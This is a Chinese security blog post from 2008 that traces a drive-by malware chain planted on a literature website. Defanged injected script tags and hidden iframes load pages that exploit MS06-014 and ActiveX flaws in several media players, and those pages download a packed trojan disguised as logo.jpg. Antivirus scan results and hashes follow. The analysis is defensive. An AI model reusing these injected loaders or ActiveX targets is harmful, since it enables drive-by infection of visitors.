某文学网站挂马logo.jpg/logo.exe
endurer 原创
2008-04-30 第1版
该网站网页包含代码:
/---
<script src="hxxp://www.ol***d*rain.com/ads/iw_t.js"></scipt>
---/
#1 hxxp://www.ol***d*rain.com/ads/iw_t.js 包含代码:
/---
<script src='/images/jin.gif'></script>
---/
#1.1 hxxp://www.ol***d*rain.com/images/jin.gif包含JavaScript代码,其功能为检查cookie变量my_ad,输出代码:
/---
<script language="javascript" src="hxxp://ww**.shi**t*ip.com/file/my.js"></script>
---/
#1.1.1 hxxp://ww**.shi**t*ip.com/file/my.js 输出代码:
/---
<script language='javascript' src='hxxp://ad.shi**t*ip.com/file/ad.js'></script>
---/
#1.1.1.1 hxxp://ad.shi**t*ip.com/file/ad.js 输出代码:
/---
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/logo.htm'></iframe>
<iframe width='25' height='0' src='hxxp://ww**.shi**t*ip.com/file/xunlei.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/real.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/lz.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/bf.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/pps.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/sdr.htm'></iframe>
<iframe name='mycountif' width='0' height='0'></iframe>
---/
#1.1.1.1.1 hxxp://ww**.shi**t*ip.com/file/logo.htm
利用 MS06-014漏洞下载 hxxp://ww**.shi**t*ip.com/file/images/logo.jpg
文件说明符 : D:/test/logo.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-30 12:31:44
修改时间 : 2008-4-30 12:31:44
大小 : 30788 字节 30.68 KB
MD5 : 497cd95b261c35e380c33065058cc7ac
SHA1: 1B4A5CD93D8C4F347DEAA8BA55F6A50DE0BA4FAE
CRC32: 3e7aaf5e
文件 497cd95b261c35e380c33065058cc7ac- 接收于 2008.04.30 07:38:54 (CET)
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.4.30.0 | 2008.04.29 | - |
AntiVir | 7.8.0.10 | 2008.04.29 | TR/Dropper.Gen |
Authentium | 4.93.8 | 2008.04.27 | - |
Avast | 4.8.1169.0 | 2008.04.29 | - |
AVG | 7.5.0.516 | 2008.04.30 | Clicker.NBD |
BitDefender | 7.2 | 2008.04.30 | - |
CAT-QuickHeal | 9.50 | 2008.04.29 | (Suspicious) - DNAScan |
ClamAV | 0.92.1 | 2008.04.30 | PUA.Packed.UPack-2 |
DrWeb | 4.44.0.09170 | 2008.04.29 | - |
eSafe | 7.0.15.0 | 2008.04.28 | - |
eTrust-Vet | 31.3.5746 | 2008.04.30 | - |
Ewido | 4.0 | 2008.04.29 | - |
F-Prot | 4.4.2.54 | 2008.04.30 | - |
F-Secure | 6.70.13260.0 | 2008.04.30 | - |
Fortinet | 3.14.0.0 | 2008.04.29 | - |
Ikarus | T3.1.1.26 | 2008.04.30 | Trojan-Dropper |
Kaspersky | 7.0.0.125 | 2008.04.30 | - |
McAfee | 5284 | 2008.04.29 | New Malware.aj |
Microsoft | None | 2008.04.22 | - |
NOD32v2 | 3064 | 2008.04.29 | Win32/TrojanClicker.Agent.NCS |
Norman | 5.80.02 | 2008.04.29 | - |
Panda | 9.0.0.4 | 2008.04.30 | Suspicious file |
Prevx1 | V2 | 2008.04.30 | - |
Sophos | 4.28.0 | 2008.04.30 | Mal/Packer |
Sunbelt | 3.0.1056.0 | 2008.04.17 | VIPRE.Suspicious |
Symantec | 10 | 2008.04.30 | - |
TheHacker | 6.2.92.297 | 2008.04.29 | W32/Behav-Heuristic-060 |
VBA32 | 3.12.6.5 | 2008.04.29 | - |
VirusBuster | 4.3.26:9 | 2008.04.29 | Packed/Upack |
Webwasher-Gateway | 6.6.2 | 2008.04.30 | Trojan.Dropper.Gen |
附加信息 | |||
File size: 30499 bytes | |||
MD5...: f72b708b004a1ccfde0b3e10bced6cda | |||
SHA1..: 439bac0bf2b84d09be5abce588b65bbb3cac55e9 | |||
SHA256: 60c6c4caa211c6fec6b011ba7d1574ce139854cb0fee5ca3591f3379f06e09c1 | |||
SHA512: a050cf1e7e7874a6f3df0b974964e7d5d2137c38423c872f739c77665433faac<BR>5ba51cc952a860642d241115ff8a314d09e3c9659ab9d7c694464c4323a32d0a | |||
PEiD..: - | |||
PEInfo: - | |||
packers: UPack | |||
packers: PE_Patch, UPack | |||
#1.1.1.1.2 hxxp://ww**.shi**t*ip.com/file/xunlei.htm
利用迅雷(PPlayer.XPPlayer.1,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg
#1.1.1.1.3 hxxp://ww**.shi**t*ip.com/file/real.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg
#1.1.1.1.4 hxxp://ww**.shi**t*ip.com/file/lz.htm
利用联众(GLCHAT.GLChatCtrl.1,clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg
#1.1.1.1.5 hxxp://ww**.shi**t*ip.com/file/bf.htm
利用暴风暴音(MPS.StormPlayer,clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg
#1.1.1.1.6 hxxp://ww**.shi**t*ip.com/file/pps.htm
利用PPStream(POWERPLAYER.PowerPlayerCtrl.1,clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458)漏洞下载 hxxp://ww**.shi**t*ip.com/file/images/logo.jpg
hxxp://ww**.shi**t*ip.com/file/sdr.htm
利用超星阅览器(clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg
标签:ip,exe,挂马,com,ww,file,shi,logo,hxxp From: https://blog.51cto.com/endurer/5878232